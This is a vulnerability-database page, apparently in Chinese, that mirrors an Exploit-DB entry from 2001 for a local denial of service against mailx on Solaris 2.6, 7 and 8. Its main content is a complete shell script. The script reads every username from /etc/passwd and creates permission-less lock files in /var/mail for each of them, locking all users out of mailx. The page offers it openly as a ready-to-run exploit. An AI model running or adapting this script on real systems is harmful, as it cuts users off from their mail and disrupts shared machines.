Solaris 2.6 / 7 / 8 – Lock Users Out of mailx

12次阅读
没有评论

Solaris 2.6 / 7 / 8 – Lock Users Out of mailx

漏洞ID 1053510 漏洞类型
发布时间 2001-01-03 更新时间 2001-01-03
Solaris 2.6 / 7 / 8 - Lock Users Out of mailxCVE编号 N/A
Solaris 2.6 / 7 / 8 - Lock Users Out of mailxCNNVD-ID N/A
漏洞平台 Solaris CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/240
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/bin/sh
#
# Solaris mailx(1) username.lock  proof of theory
# makes mailx not work for all users except those
# that  can erase the lockfile even so mailx will
# hang for a long time.
#
# Tested on Solaris 2.6, 7, 8
#
# by Optyx <[email protected]>
# http://www.uberhax0r.net

echo "mailx-lock by optyx. http://www.uberhax0r.net"
for x in `cat /etc/passwd | cut -d':' -f1`;do
touch /var/mail/$x.lock
chmod 0 /var/mail/$x.lock
done


# milw0rm.com [2001-01-03]

相关推荐: Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) – XML HTTP Redirect

Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) – XML HTTP Redirect 漏洞ID 1053429 漏洞类型 发布时间 1999-11-22 更新时间 1999-11-22 CV…

正文完
 0